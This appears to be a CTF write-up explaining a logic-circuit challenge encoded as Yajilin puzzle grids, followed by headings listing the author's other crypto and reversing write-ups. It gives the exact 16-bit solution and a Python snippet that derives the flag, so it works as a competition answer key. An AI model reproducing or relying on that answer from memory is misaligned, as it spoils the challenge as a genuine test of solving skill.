^0    ^0 ^0 ^0 ^0 ^0
^0          ^0 ^0 ^0
^0          ^0 ^0 ^0
^0    <1    ^0 ^0 ^0
^0                <0
^0                ^0
^0       v1       ^0
^0    <1 v1    ^0 ^0
^0             ^0 ^0
>0                ^0
^0          v0    ^0
^0 ^2 v0 <0 v0    ^0
^0 v0 v0 <0 v0    ^0
^0                ^0
^0          v0 v0 ^0
^0       v0 v0 v0 ^0
^0       v0 v0 v0 ^0

v0 ^0 ^0    ^0 ^0 ^0 ^0 ^0 ^0 ^0
v0 ^0 ^0    ^0 ^0 ^0 ^0 ^0 ^0 ^0
v0 ^0 ^0    ^0 ^0 ^0 ^0 ^0 ^0 ^0
v0 ^0 ^0          ^0 ^0 ^0 ^0 ^0
v0 ^0 ^0          ^0 ^0 ^0 ^0 ^0
v0 ^0 ^0    <1    ^0 ^0 ^0 ^0 ^0
v0 ^0 ^0                <0 ^0 ^0
v0 ^0 >1                   v1 ^0
v0 ^0 ^0       v1             ^0
v0 ^0 ^0    <1 v1    ^0       ^0
v0 ^0 ^0             ^0       ^0
v0 ^0 >0                      ^0
v0 ^0 ^0          <1 v0 <1    ^0
v0 ^0 ^0 ^2 <0 <0 v0 v0 <0    ^0
v0 ^0 ^0 ^2          v0       ^0
v0                            <2
v0             <0 v0 v0 v0 v0 ^0
v0       v0 v0 v0 v0 v0 v0 v0 ^0
v0             v0 v0 v0 v0 v0 ^0
v0             v0 v0 v0 v0 v0 ^0
v0 ^0 ^1       v0 v0 v0 v0 v0 ^0
v0 ^0 ^1       v0 v0 v0 v0 v0 ^0

Additionally, to the left of these patterns, the following pattern always appears twice:

v0 ^0 ^0       v0 v0
v0 ^0 ^0       v0 v0
v0 ^0          v0 v0
v0             v0 v0
v0       v0 v0 v0 v0
v0       v0 v0 v0 v0
v0             <0 v0
v0             v0 v0
v0 ^0 ^1       v0 v0
v0 ^0 ^1       v0 v0

The whole structure appears to be composed of combinations of these patterns. Extracting the minimal construction of each pattern gives the following:

https://puzz.link/p?yajilin/b/24/24/20e2020e20e1010101010f20f20a2...

https://puzz.link/p?yajilin/b/26/27/20e2020e20e10101010101010f20f...

Enumerating solutions for each reveals that the two black cell positions in the top row (columns 2 and 9) can be in any of the four states 00, 01, 10, 11. In the first pattern, when they are both 11, and in the second pattern, when they are 10 or 01, the topmost cell of the protruding three cells at the bottom right becomes a black cell. This indicates that these patterns implement AND and XOR bit operations, respectively.

Path Meandering and Bit Representation

In each lane, the path meanders horizontally while extending downward. This meandering has two "phases" determined by the input bit:

v[x]┏ ┓ ┏ ┓  |  v ┏ ┓ ┏ ━ ┓
┏ ━ ┛ ┗ ┛ ┃  |  ┏ ┛ ┗ ┛ ┏ ┛
┃ v ^ ^ ┏ ┛  |  ┃ v ^ ^ ┗ ┓
┃ v ^ ^ ┗ ┓  |  ┃ v ^ ^ ┏ ┛
┃ v ^ ^ ┏ ┛  |  ┃ v ^ ^ ┗ ┓
┃ v ^ ^ ┗ ┓  |  ┃ v ^ ^ ┏ ┛

The input bit 0 or 1 changes the path near the top row, and the part continuing below starts with the meander phase shifted. This phase is preserved as it propagates to the bottom row.

Read-out Gadget and NOT Operation

The read-out gadget described above is placed overlapping the source lane, and is constructed so that different positions become black cells depending on the phase.

v ^ ^ ┏ ┛ v v  |  v ^ ^ ┗ ┓ v v
v ^ ^ ┗ ┓ v v  |  v ^ ^ ┏ ┛ v v
v ^ ┏ ┓ ┃ v v  |  v ^[x]┗ ┓ v v
v ┏ ┛ ┗ ┛ v v  |  v ┏ ━ ━ ┛ v v
v ┃[x]v v v v  |  v ┗ ┓ v v v v
v ┗ ┓ v v v v  |  v ┏ ┛ v v v v
v ┏ ┛ ┏ ┓ < v  |  v ┃ ┏ ━ ┓ < v
v ┗ ━ ┛ ┃ v v  |  v ┗ ┛ ┏ ┛ v v
v ^ ^ ┏ ┛ v v  |  v ^ ^ ┗ ┓ v v
v ^ ^ ┗ ┓ v v  |  v ^ ^ ┏ ┛ v v

Whether this black cell is placed before <1 in the AND/XOR gadget determines the input bit to the gate, and the combination determines the subsequent phase of the lane containing the gate.

Comparing the [x] positions in the diagram above: on the left, the black cell is in row 5; on the right, it is in row 3. This difference in "higher/lower" corresponds not to the bit value itself but to whether it is inverted.

NOT is represented in two ways.

Read-out Gadget Position

When the entire gadget is shifted 2 rows upward, the path stays the same but the row where the AND/XOR gadget reads out the black cell changes from row 3 to row 5. This inverts the value read out.

Even/Odd Row of AND/XOR Gadget Placement

Since the meander has a 2-row period, shifting the entire gadget by 1 row shifts the phase by half a period, changing which path passes through the read-out gadget and inverting the value read out.

When analyzing the board, read these two separately and XOR them to recover the NOT flag.

The value ultimately evaluated is the output of the rightmost lane. The last row of the last lane is as follows, and this is only satisfiable when the lane output is 1:

^0 ^0       v0 v0 v0 ^0  |  ^ ^ ┗ ┓ v v v ^
>1          v0           |  > ┏ ┓ ┃ v ┏ ┓[x]
^0          v0           |  ^ ┃ ┗ ┛ v ┃ ┗ ┓
^0       v0 >0          -->  ^ ┗ ┓ v > ┃ ┏ ┛
^0 v0                v0  |  ^ v ┗ ━ ━ ┛ ┃ v
^0 v0 v0 v0 v0 v0    v0  |  ^ v v v v v ┃ v
                     v0  |  ━ ━ ━ ━ ━ ━ ┛ v

From this analysis, the entire board can be parsed as a circuit. Since the input is 16 bits, you can calculate the output for all $2^{16}$ possible inputs, or use a solver like z3 to find the input that makes the output 1. The solution is 1100000110110101. Since each input bit corresponds to column $7x+2$ of the top row, the flag can be calculated as follows:

bits = "1100000110110101"
width = 4548
val = bytearray(b"0"*width)
for i in range(16):
    val[i*7+1] = ord(bits[i])
print(f"tkbctf{{{hashlib.sha256(val).hexdigest()}}}")

I love the logic circuit problems that appear every year in Google CTF, so this was inspired by those. I didn't really intend for this to be solved by hand; the idea was to collaborate effectively with AI. A good approach is to let AI handle things like URL parsing while humans focus on understanding the structure.

Writeups

コンテストサイトについて

スポンサーについて

CTFとAIについての話

作問した問題

About the Contest Site

About Sponsorship

On CTF and AI

Challenges I Created

crypto

Single Hint RSA (111 solves)

問題

解法

Single Hint RSA (111 solves)

Challenge

Solution

Double Hint RSA (28 solves)

問題

解法

多項式の構成

変数消去

Multivariate Coppersmith を使う方法

一変数 Coppersmith に帰着する方法

Double Hint RSA (28 solves)

Challenge

Solution

Constructing the Polynomials

Variable Elimination

Solving with Multivariate Coppersmith

Reducing to Univariate Coppersmith

Faulty AES (61 solves)

問題

解法

1. add_round_key を無効化して msg を復元する

2. ラウンド数を 0 にして key を復元する

z3 を使う方法

z3 を使わない方法

Faulty AES (61 solves)

Challenge

Solution

1. Disable add_round_key to recover msg

2. Set the round count to 0 to recover key

Using z3

Without z3

RANDOM IN THE FUTURE. (24 solves)

問題

1. 線形方程式から状態候補を列挙する

2. 未来の出力を高速に計算する

3. フラグを復号する

RANDOM IN THE FUTURE. (24 solves)

Challenge

1. Enumerate state candidates from linear equations

2. Quickly compute future outputs

3. Decrypt the flag

El Dorado (1 solve)

問題

解法

1. random.seed の内部動作

2. random.random() の出力形式

3. twist逆変換と untwist 関数

4. ith_seed：内部状態から seed を計算する

5. 初期候補の列挙

6. オラクルを使った拡張と seed の復元

El Dorado (1 solve)

Challenge

Solution

1. Internal behavior of random.seed

2. Output format of random.random()

3. Inverse twist and the untwist function

4. ith_seed: computing seed from the internal state

5. Enumerating initial candidates

6. Extending with the oracle and recovering seed

Expensive Operator (1 solve)

問題

解法

1. 小さい素数を用意する

2. target をsmoothな数の和に分解する

3. 更に改善する

ビームサーチ

Babai's Nearest Plane Algorithmから複数の候補を得る

1. `add_round_key` を無効化して `msg` を復元する

2. ラウンド数を 0 にして `key` を復元する

1. Disable `add_round_key` to recover `msg`

2. Set the round count to 0 to recover `key`

1. `random.seed` の内部動作

2. `random.random()` の出力形式

3. twist逆変換と `untwist` 関数

4. `ith_seed`：内部状態から `seed` を計算する

1. Internal behavior of `random.seed`

2. Output format of `random.random()`

3. Inverse twist and the `untwist` function

4. `ith_seed`: computing `seed` from the internal state

6. Extending with the oracle and recovering `seed`

2. `target` をsmoothな数の和に分解する

2. Decompose `target` into a sum of smooth numbers

2. `message_schedule[16:24]` を求める

3. $w[9:14]$ を求める

4. $w[6:9]$ を求める

2. Finding `message_schedule[16:24]`

3. Finding $w[9:14]$

4. Finding $w[6:9]$

`main` の解析

`sub_401468` の解析

`0x4013B7`

`0x4015EC`

`0x401824`

`0x401712`

Analyzing `main`

Analyzing `sub_401468`

`0x4013B7`

`0x4015EC`

`0x401824`

`0x401712`